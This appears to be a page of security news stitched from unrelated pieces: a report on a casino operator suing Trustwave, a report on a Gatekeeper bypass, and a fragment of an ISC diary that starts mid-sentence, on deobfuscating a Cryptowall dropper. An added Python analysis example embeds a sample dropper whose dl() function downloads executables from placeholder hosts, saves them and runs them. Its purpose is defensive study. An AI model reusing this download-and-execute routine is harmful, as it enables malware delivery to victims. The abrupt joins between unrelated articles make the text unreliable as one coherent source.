Information Security News
A Las Vegas-based casino operator has sued security firm Trustwave for conducting an allegedly "woefully inadequate" forensics investigation that missed key details of a network breach and allowed credit card thieves to maintain their foothold during the course of the two-and-a-half-month investigation.
In a legal complaint filed in federal court in Las Vegas, Affinity Gaming said it hired Trustwave in October 2013 to investigate and contain a network breach that allowed attackers to obtain customers' credit card data. In mid-January 2014, Trustwave submitted a report required under payment card industry security rules for all merchants who accept major credit cards. In the PCI forensics report, Trustwave said it had identified the source of the data breach and had contained the malware responsible for it. More than a year later, after Affinity was hit by a second credit card breach, the casino operator allegedly learned from Trustwave competitor Mandiant that the malware had never been fully removed.
According to the December 2015 complaint:
In September, Ars reported a drop-dead simple exploit that completely bypassed an OS X security feature known as Gatekeeper. Apple shipped a fix, but now the security researcher who discovered the original vulnerability said he found an equally obvious work-around.
Patrick Wardle said the security fix consisted of blacklisting a small number of known files he privately reported to Apple that could be repackaged to install malicious software on Macs, even when Gatekeeper is set to its most restrictive setting. Wardle was able to revive his attack with little effort by finding a new Apple trusted file that hadn't been blocked by the Apple update. In other words, it was precisely the same attack as before, except it used a new, previously unblocked Apple-trusted file. Notably, that file was offered by security company Kaspersky Lab. Late on Thursday, Apple released an update blocking that file, too.
"It literally took me five minutes to fully bypass it," Wardle, who is director of research at security firm Synack, told Ars, referring to the updated Gatekeeper. "So yes, it means that the immediate issue is mitigated and cannot be abused anymore. However, the core issue is not fixed, so if anybody finds another app that can be abused we are back to square one (full Gatekeeper bypass)."
is to click on Clues
If we search for rbhxtuqpiq, we see that the variable is populated with the content of pkwefagovz.
Based on this analysis, we know that pkelgjqh is our obfuscated eval() function. We can now highlight it and use Convert.
And finally, to make the code more readable, use the Copy Output to Input button followed by Beautify.
Now the script looks very simple. It contains a dl() function which downloads two malicious payloads, saves them in the %TEMP% directory using the provided name and executes them. You can now extract IOCs and, if interested, download the two binaries for further analysis. Here is a link to the analyzed content of both URLs:
https://www.virustotal.com/en/url/87ea8c2ac74b9dee82955fe7c7d6d81c350b6fc22615dd7d521c1ce1227a3e09/analysis/ (Cryptowall 4.0)
This technique is not fully automated, as it would be in a malware analysis system running a sandbox, but it helps you really understand how the scripts work and how attackers implement new obfuscation techniques. Happy hunting!
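The manual steps above (find the variable holding the payload, identify the renamed eval(), reveal the inner script, extract IOCs) can be reproduced statically for this class of dropper. The following is an added example, not code from the diary or the tool it uses: it resolves the alias chain and the renamed eval() without executing anything, then pulls the URLs as IOCs. The sample script, its variable names and its URLs are constructed placeholders.

```python
import re

# Constructed sample in the style of the analysed dropper: the payload sits in a
# string, is copied through an alias, and is run via a renamed eval(). The URLs
# are placeholders, not real indicators.
SAMPLE = r'''
var pkwefagovz = "function dl(u,n){var x=new ActiveXObject('MSXML2.XMLHTTP');x.open('GET',u,0);x.send();var s=new ActiveXObject('ADODB.Stream');s.Open();s.Type=1;s.Write(x.ResponseBody);s.SaveToFile(n,2);s.Close();new ActiveXObject('WScript.Shell').Run(n);}dl('http://payload1.example.invalid/a.exe','a.exe');dl('http://payload2.example.invalid/b.exe','b.exe');";
var rbhxtuqpiq = pkwefagovz;
var pkelgjqh = eval;
pkelgjqh(rbhxtuqpiq);
'''

# var NAME = "literal";  or  var NAME = OTHER_NAME;
ASSIGN_RE = re.compile(r'var\s+(\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|(\w+))\s*;')
# NAME(ARG);  -- a call with a single bare identifier as argument
CALL_RE = re.compile(r'(\w+)\s*\(\s*(\w+)\s*\)\s*;')
URL_RE = re.compile(r'https?://[^\s\'"]+')

def collect_assignments(script):
    """Map variable name -> ('str', literal) or ('ref', other_name)."""
    env = {}
    for m in ASSIGN_RE.finditer(script):
        name, literal, ref = m.groups()
        env[name] = ('str', literal) if literal is not None else ('ref', ref)
    return env

def resolve(env, name, depth=0):
    """Follow alias chains to a string literal or an unbound name such as eval."""
    if depth > 20:  # hostile input may contain a = b; b = a; loops
        raise ValueError('alias chain too deep')
    kind, value = env.get(name, ('ref', name))
    if kind == 'str' or value == name:
        return value
    return resolve(env, value, depth + 1)

def reveal_eval_argument(script):
    """Return the text the renamed eval() would have executed, or None."""
    env = collect_assignments(script)
    for func, arg in CALL_RE.findall(script):
        if resolve(env, func) == 'eval':
            return resolve(env, arg)
    return None

def extract_urls(text):
    """Collect download URLs from the revealed script as IOCs."""
    return sorted(set(URL_RE.findall(text)))

if __name__ == '__main__':
    inner = reveal_eval_argument(SAMPLE)
    print(inner)
    print('IOCs:', extract_urls(inner))
```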
ISC Handler - Freelance Security Consultant